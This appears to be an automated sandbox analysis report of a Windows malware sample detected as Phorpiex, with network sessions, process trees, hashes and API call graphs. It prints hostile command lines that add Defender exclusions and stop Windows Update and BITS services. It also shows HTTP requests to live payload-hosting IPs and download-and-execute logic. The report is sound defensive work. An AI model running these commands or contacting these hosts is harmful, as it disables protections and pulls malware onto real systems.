                                                                                                                                  Data Ascii: iRglJ}~M{KcgE/SMO@4m`M#W$>4Qv_'c'6WgFezegT~@X=TL6bs:*n]:Cuj+JM,`!"\~Is%id~$-Ac&)\l[(o?=p\7?hH&h


Session ID: 3
Source IP: 192.168.2.4
Source Port: 49740
Destination IP: 91.202.233.141
Destination Port: 80
PID: 3060
Process: C:\Windows\sysppvrdnvs.exe

Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 11:11:25.596575022 CET  171  OUT  GET /dwntbl HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
    Host: 91.202.233.141
Oct 28, 2024 11:11:26.495398998 CET  1236  IN  HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 28 Oct 2024 10:11:26 GMT
    Content-Type: application/octet-stream
    Content-Length: 85760
    Last-Modified: Thu, 10 Oct 2024 07:40:46 GMT
    Connection: keep-alive
    ETag: "670784fe-14f00"
    Accept-Ranges: bytes


Session ID: 4
Source IP: 192.168.2.4
Source Port: 57562
Destination IP: 185.215.113.66
Destination Port: 80
PID: 3060
Process: C:\Windows\sysppvrdnvs.exe

Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 11:11:28.415307045 CET  166  OUT  GET /2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
    Host: 185.215.113.66
Oct 28, 2024 11:11:29.339632034 CET  1236  IN  HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 28 Oct 2024 10:11:29 GMT
    Content-Type: application/octet-stream
    Content-Length: 8960
    Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
    Connection: keep-alive
    ETag: "671230ee-2300"
    Accept-Ranges: bytes


Session ID: 5
Source IP: 192.168.2.4
Source Port: 57563
Destination IP: 185.215.113.66
Destination Port: 80
PID: 3060
Process: C:\Windows\sysppvrdnvs.exe

Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 11:11:30.365884066 CET  166  OUT  GET /2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
    Host: 185.215.113.66
Oct 28, 2024 11:11:31.283780098 CET  1236  IN  HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 28 Oct 2024 10:11:31 GMT
    Content-Type: application/octet-stream
    Content-Length: 8960
    Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
    Connection: keep-alive
    ETag: "671230ee-2300"
    Accept-Ranges: bytes
                                                                                                                                  Data Ascii: zx!0hH$;9`6\(<V67E9/:j;>|Wk<cb4Gcap`%SmttII@i

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:06:11:07
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Bjl3geiFEK.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Bjl3geiFEK.exe"
                                                                                                                                  Imagebase:0x4b0000
                                                                                                                                  File size:10'240 bytes
                                                                                                                                  MD5 hash:ED9FBBBE548C41479CB70E4D694793D0
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:1
                                                                                                                                  Start time:06:11:12
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\33080.scr
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\33080.scr" /S
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:85'504 bytes
                                                                                                                                  MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\33080.scr, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:06:11:14
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:85'504 bytes
                                                                                                                                  MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                  Imagebase:0x240000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                                                                                                                  Imagebase:0x240000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                  Imagebase:0xf70000
                                                                                                                                  File size:433'152 bytes
                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop UsoSvc
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop WaaSMedicSvc
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop wuauserv
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop DoSvc
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop BITS /wait
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:13
                                                                                                                                  Start time:06:11:19
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                  File size:496'640 bytes
                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:17
                                                                                                                                  Start time:06:11:26
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\sysppvrdnvs.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:85'504 bytes
                                                                                                                                  MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:18
                                                                                                                                  Start time:06:11:28
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\818921588.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\818921588.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:85'504 bytes
                                                                                                                                  MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                                                  Has exited:true


                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:45.8%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:43.9%
                                                                                                                                    Total number of Nodes:98
                                                                                                                                    Total number of Limit Nodes:2
                                                                                                                                    execution_graph 303 4b1de8 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 304 4b1eda GetCurrentProcess TerminateProcess 303->304 305 4b1ed2 _crt_debugger_hook 303->305 305->304 306 4b19a1 307 4b19dd 306->307 309 4b19b3 306->309 308 4b19d8 ?terminate@ 308->307 309->307 309->308 316 4b1691 321 4b1a9d 316->321 319 4b16ce _amsg_exit 320 4b16d6 319->320 324 4b19f8 321->324 323 4b1696 __getmainargs 323->319 323->320 331 4b1c6c 324->331 326 4b1a04 _decode_pointer 327 4b1a1b _onexit 326->327 328 4b1a27 7 API calls 326->328 329 4b1a8b __onexit 327->329 332 4b1a94 _unlock 328->332 329->323 331->326 332->329 333 4b1851 _XcptFilter 245 4b16d7 266 4b1c6c 245->266 247 4b16e3 GetStartupInfoA 248 4b1711 InterlockedCompareExchange 247->248 249 4b171f 248->249 250 4b1723 248->250 249->250 251 4b172a Sleep 249->251 252 4b174d 250->252 253 4b1743 _amsg_exit 250->253 251->248 254 4b1776 252->254 255 4b1756 _initterm_e 252->255 253->254 256 4b17a0 254->256 257 4b1785 _initterm 254->257 255->254 259 4b1771 __onexit 255->259 258 4b17a4 InterlockedExchange 256->258 261 4b17ac __IsNonwritableInCurrentImage 256->261 257->256 258->261 260 4b183b _ismbblead 260->261 261->260 263 4b1880 261->263 264 4b1825 exit 261->264 267 4b10b0 Sleep 261->267 263->259 265 4b1889 _cexit 263->265 264->261 265->259 266->247 268 4b10e0 DeleteFileW FindWindowA 267->268 269 4b1100 DeleteFileW 268->269 270 4b10f4 MoveFileW 268->270 269->268 271 4b110c 269->271 270->269 272 4b1324 LoadLibraryA 271->272 273 4b166b 272->273 274 4b133e 272->274 273->261 275 4b1348 LoadLibraryA 274->275 275->273 276 4b135c 275->276 277 4b1369 LoadLibraryA 276->277 277->273 278 4b137b 277->278 279 4b1388 LoadLibraryA 278->279 279->273 280 4b139a 279->280 281 4b13a4 GetProcAddress 280->281 281->273 282 4b13bb 281->282 283 4b13c8 GetProcAddress 282->283 283->273 284 
4b13d9 283->284 285 4b13e6 GetProcAddress 284->285 285->273 286 4b13fd 285->286 287 4b140a GetProcAddress 286->287 287->273 288 4b141f GetTickCount srand 287->288 289 4b1435 288->289 289->289 290 4b1447 mbstowcs 289->290 291 4b1477 290->291 291->291 292 4b1497 mbstowcs wsprintfW PathFileExistsW 291->292 293 4b1649 FreeLibrary FreeLibrary FreeLibrary FreeLibrary 292->293 294 4b14e7 292->294 293->273 294->294 295 4b1507 mbstowcs 294->295 296 4b1537 295->296 296->296 297 4b1557 mbstowcs rand wsprintfW 296->297 298 4b15b0 297->298 299 4b15c7 mbstowcs 298->299 300 4b15ea 299->300 301 4b15fb mbstowcs URLDownloadToFileW 300->301 301->293 302 4b1630 ShellExecuteW 301->302 302->293 334 4b1997 337 4b1d18 334->337 336 4b199c 336->336 338 4b1d4a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 337->338 339 4b1d3d 337->339 340 4b1d41 338->340 339->338 339->340 340->336 341 4b18b6 343 4b18c4 __set_app_type _encode_pointer __p__fmode __p__commode 341->343 344 4b1963 _pre_c_init __RTC_Initialize 343->344 345 4b197d 344->345 346 4b1971 __setusermatherr 344->346 351 4b1cea _controlfp_s 345->351 346->345 349 4b198b _configthreadlocale 350 4b1994 349->350 352 4b1982 351->352 353 4b1d06 _invoke_watson 351->353 352->349 352->350 353->352 310 4b1cc5 _except_handler4_common 311 4b1865 312 4b1879 _exit 311->312 313 4b1880 311->313 312->313 314 4b1889 _cexit 313->314 315 4b188f __onexit 313->315 314->315


                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 004B10BF
                                                                                                                                    • DeleteFileW.KERNELBASE(778g87b7b8787b7), ref: 004B10E5
                                                                                                                                    • FindWindowA.USER32(778g87b7b8787b7,00000000), ref: 004B10EE
                                                                                                                                    • MoveFileW.KERNEL32(778g87b7b8787b7,778g87b7b8787b7), ref: 004B10FE
                                                                                                                                    • DeleteFileW.KERNELBASE(778g87b7b8787b7778g87b7b8787b7), ref: 004B1105
                                                                                                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 004B132E
                                                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 004B134C
                                                                                                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 004B136D
                                                                                                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 004B138C
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004B13AF
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004B13CD
                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004B13EF
                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004B1413
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004B141F
                                                                                                                                    • srand.MSVCR90 ref: 004B1426
                                                                                                                                    • mbstowcs.MSVCR90 ref: 004B1458
                                                                                                                                    • mbstowcs.MSVCR90 ref: 004B14A8
                                                                                                                                    • wsprintfW.USER32 ref: 004B14D0
                                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 004B14DD
                                                                                                                                    • mbstowcs.MSVCR90 ref: 004B1518
                                                                                                                                    • mbstowcs.MSVCR90 ref: 004B1568
                                                                                                                                    • rand.MSVCR90 ref: 004B1578
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1807312821.00000000004B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1807296218.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1807329261.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1807343166.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_4b0000_Bjl3geiFEK.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressFileLibraryLoadProcmbstowcs$Delete$CountExistsFindMovePathSleepTickWindowrandsrandwsprintf
                                                                                                                                    • String ID: "K$%s\%d%s$%s\%s$778g87b7b8787b7$778g87b7b8787b7$778g87b7b8787b7$778g87b7b8787b7$778g87b7b8787b7778g87b7b8787b7
                                                                                                                                    • API String ID: 2649378626-1968070415
                                                                                                                                    • Opcode ID: 05af62771ce60b95c3cf359e96dcec27e4704eba9465244f88f31c32785f2443
                                                                                                                                    • Instruction ID: 5074f222bf24171671938b51c012338d793ee46f101870637a2272c7b73c1ac7
                                                                                                                                    • Opcode Fuzzy Hash: 05af62771ce60b95c3cf359e96dcec27e4704eba9465244f88f31c32785f2443
                                                                                                                                    • Instruction Fuzzy Hash: B7F131B55083419BC324DF68DD50AEBB7E9AF88344F448A2EF589C3361EB74D504CB6A

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:0.9%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:17.5%
                                                                                                                                    Total number of Nodes:1501
                                                                                                                                    Total number of Limit Nodes:8
                                                                                                                                    execution_graph 4451 407940 Sleep CreateMutexA GetLastError 4452 407976 ExitProcess 4451->4452 4453 40797e 6 API calls 4451->4453 4454 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4453->4454 4455 407a23 4453->4455 4456 407dcb RegOpenKeyExW 4454->4456 4457 407d9f RegSetValueExW RegCloseKey 4454->4457 4530 40f1b0 GetLocaleInfoA strcmp 4455->4530 4459 407e24 RegOpenKeyExW 4456->4459 4460 407df8 RegSetValueExW RegCloseKey 4456->4460 4457->4456 4462 407e51 RegSetValueExW RegCloseKey 4459->4462 4463 407e7d RegOpenKeyExW 4459->4463 4460->4459 4462->4463 4468 407ed6 RegOpenKeyExW 4463->4468 4469 407eaa RegSetValueExW RegCloseKey 4463->4469 4464 407a30 ExitProcess 4465 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4466 407b36 Sleep wsprintfW CopyFileW 4465->4466 4467 407a8c SetFileAttributesW RegOpenKeyExW 4465->4467 4473 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4466->4473 4474 407b7e SetFileAttributesW RegOpenKeyExW 4466->4474 4467->4466 4472 407ac8 wcslen RegSetValueExW 4467->4472 4470 407f03 RegSetValueExW RegCloseKey 4468->4470 4471 407f2f RegOpenKeyExW 4468->4471 4469->4468 4470->4471 4476 407f88 RegOpenKeyExW 4471->4476 4477 407f5c RegSetValueExW RegCloseKey 4471->4477 4478 407b29 RegCloseKey 4472->4478 4479 407afd RegCloseKey 4472->4479 4473->4454 4475 407c87 SetFileAttributesW RegOpenKeyExW 4473->4475 4474->4473 4480 407bba wcslen RegSetValueExW 4474->4480 4475->4454 4481 407cc3 wcslen RegSetValueExW 4475->4481 4483 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4476->4483 4484 40801f RegOpenKeyExW 4476->4484 4477->4476 4478->4466 4532 40f400 memset memset CreateProcessW 4479->4532 4485 407c1b RegCloseKey 4480->4485 4486 407bef RegCloseKey 4480->4486 4487 407d24 RegCloseKey 4481->4487 4488 407cf8 RegCloseKey 4481->4488 4483->4484 4490 408050 RegSetValueExW RegSetValueExW RegSetValueExW 
RegSetValueExW RegCloseKey 4484->4490 4491 4080d9 RegOpenKeyExW 4484->4491 4485->4473 4492 40f400 6 API calls 4486->4492 4487->4454 4493 40f400 6 API calls 4488->4493 4490->4491 4495 4081f0 RegOpenKeyExW 4491->4495 4496 40810a 8 API calls 4491->4496 4497 407c08 4492->4497 4498 407d11 4493->4498 4494 407b21 ExitProcess 4499 408221 8 API calls 4495->4499 4500 408307 Sleep 4495->4500 4496->4495 4497->4485 4501 407c13 ExitProcess 4497->4501 4498->4487 4502 407d1c ExitProcess 4498->4502 4499->4500 4538 40d180 4500->4538 4505 408322 9 API calls 4541 405c00 InitializeCriticalSection CreateFileW 4505->4541 5364 4077f0 4505->5364 5371 4058c0 4505->5371 5380 406f70 Sleep GetModuleFileNameW 4505->5380 4508 40848e 4512 4083d7 CreateEventA 4573 40c8b0 4512->4573 4521 40dbe0 17 API calls 4522 408438 4521->4522 4523 40dbe0 17 API calls 4522->4523 4524 408453 4523->4524 4525 40dbe0 17 API calls 4524->4525 4526 40846f 4525->4526 4618 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4526->4618 4528 408480 4627 40de90 4528->4627 4531 407a28 4530->4531 4531->4464 4531->4465 4533 40f471 ShellExecuteW 4532->4533 4534 40f462 Sleep 4532->4534 4536 40f4a6 4533->4536 4537 40f497 Sleep 4533->4537 4535 407b16 4534->4535 4535->4478 4535->4494 4536->4535 4537->4535 4636 40d150 4538->4636 4542 405d25 4541->4542 4543 405c38 CreateFileMappingW 4541->4543 4555 40e0c0 CoInitializeEx 4542->4555 4544 405c59 MapViewOfFile 4543->4544 4545 405d1b CloseHandle 4543->4545 4546 405d11 CloseHandle 4544->4546 4547 405c78 GetFileSize 4544->4547 4545->4542 4546->4545 4551 405c8d 4547->4551 4548 405d07 UnmapViewOfFile 4548->4546 4549 405c9c 4549->4548 4551->4548 4551->4549 4552 405ccc 4551->4552 4765 40d1d0 4551->4765 4772 405d30 4551->4772 4553 40ab60 __aligned_recalloc_base 3 API calls 4552->4553 4553->4549 5078 40e190 socket 4555->5078 4557 4083d2 4568 407390 CoInitializeEx SysAllocString 4557->4568 4558 40e168 5122 40ac80 4558->5122 4561 40e12a 5103 40b430 htons 4561->5103 4562 
